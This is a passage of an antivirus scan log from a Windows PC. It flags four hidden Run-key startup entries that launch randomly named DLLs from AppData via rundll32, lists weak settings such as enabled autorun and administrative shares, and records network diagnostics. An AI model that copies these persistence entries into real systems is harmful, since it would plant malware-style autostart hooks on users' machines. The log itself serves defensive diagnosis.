[ES]:Application has no visible windows
Extended process analysis: 25520 C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
 Number of modules loaded: 347
Scanning RAM - complete
3. Scanning disks
4. Checking  Winsock Layered Service Provider (SPI/LSP)
 LSP settings checked. No errors detected
5. Searching for keyboard/mouse/windows events hooks (Keyloggers, Trojan DLLs)
 Checking - disabled by user
6. Searching for opened TCP/UDP ports used by malicious software
 Checking - disabled by user
7. Heuristic system check
Non-standard registry key for system service: wuauserv ImagePath=""
>>> c:\users\isaac\appdata\roaming\1000071060\rwfacade.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rwfacade.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rwfacade.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000071060\rwfacade.dll, rundll"
>>> c:\users\isaac\appdata\roaming\1000072060\rlmp32wlve.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wlve.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wlve.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000072060\rlmp32wlve.dll, Entry"
>>> c:\users\isaac\appdata\roaming\1000079060\rlmp32wce.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wce.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wce.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000079060\rlmp32wce.dll, Entry"
>>> c:\users\isaac\appdata\roaming\1000107060\ntredirect.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntredirect.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntredirect.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000107060\ntredirect.dll, Entry"
Checking - complete
8. Searching for vulnerabilities
>> Services: potentially dangerous service allowed: TermService (Remote Desktop Services)
> Services: please bear in mind that the set of services depends on the use of the PC (home PC, office PC connected to corporate network, etc)!
>> Security: disk drives' autorun is enabled
>> Security: administrative shares (C$, D$ ...) are enabled
>> Security: anonymous user access is enabled
>> Security: sending Remote Assistant queries is enabled
Checking - complete
9. Troubleshooting wizard
 >>  HDD autorun is allowed
 >>  Network drives autorun is allowed
 >>  Removable media autorun is allowed
Checking - complete
Files scanned: 603, extracted from archives: 0, malicious software found 0, suspicions - 0
Scanning finished at 23.07.2023 13:30:43
Time of scanning: 00:01:25
System Analysis in progress
Network diagnostics
 DNS and Ping test
  Host="yandex.ru", IP="5.255.255.70,5.255.255.77,77.88.55.60,77.88.55.88", Ping=OK (0,157,5.255.255.70)
  Host="google.ru", IP="172.217.4.35", Ping=OK (0,18,172.217.4.35)
  Host="google.com", IP="142.250.190.14", Ping=OK (0,20,142.250.190.14)
  Host="www.kaspersky.com", IP="0.0.0.0", Ping=Error (-1,0,0.0.0.0)
  Host="www.kaspersky.ru", IP="144.121.3.166", Ping=Error (11010,0,0.0.0.0)
  Host="dnl-03.geo.kaspersky.com", IP="4.28.136.54", Ping=OK (0,36,4.28.136.54)
  Host="dnl-11.geo.kaspersky.com", IP="38.117.98.253", Ping=OK (0,44,38.117.98.253)
  Host="activation-v2.kaspersky.com", IP="4.59.181.141", Ping=Error (11010,0,0.0.0.0)
  Host="odnoklassniki.ru", IP="5.61.23.11,217.20.155.13,217.20.147.1", Ping=OK (0,161,5.61.23.11)
  Host="vk.com", IP="87.240.132.67,87.240.132.72,87.240.132.78,87.240.137.164,93.186.225.194,...", Ping=OK (0,134,87.240.132.67)
  Host="vkontakte.ru", IP="87.240.132.78,87.240.137.164,93.186.225.194,87.240.129.133,87.240.132.72,...", Ping=OK (0,131,87.240.132.78)
  Host="twitter.com", IP="104.244.42.65", Ping=OK (0,39,104.244.42.65)
  Host="facebook.com", IP="31.13.93.35", Ping=OK (0,26,31.13.93.35)
  Host="ru-ru.facebook.com", IP="31.13.93.19", Ping=OK (0,24,31.13.93.19)
 Network IE settings
  IE setting AutoConfigURL=
  IE setting AutoConfigProxy=
  IE setting ProxyOverride=*.local
  IE setting ProxyServer=
  IE setting Internet\ManualProxies=
 Network TCP/IP settings
  Interface: "Ethernet"
   IPAddress = "192.168.0.152"
   DHCPIPAddress = "192.168.0.152"
   SubnetMask = "255.255.255.0"
   DHCPSubnetMask = "255.255.255.0"
   DefaultGateway = ""
   NameServer = ""
   Domain = ""
   DhcpServer = "192.168.0.1"
 Network Persistent Routes

System Analysis - complete
Script commands Add commands to script:

Additional operations:

File list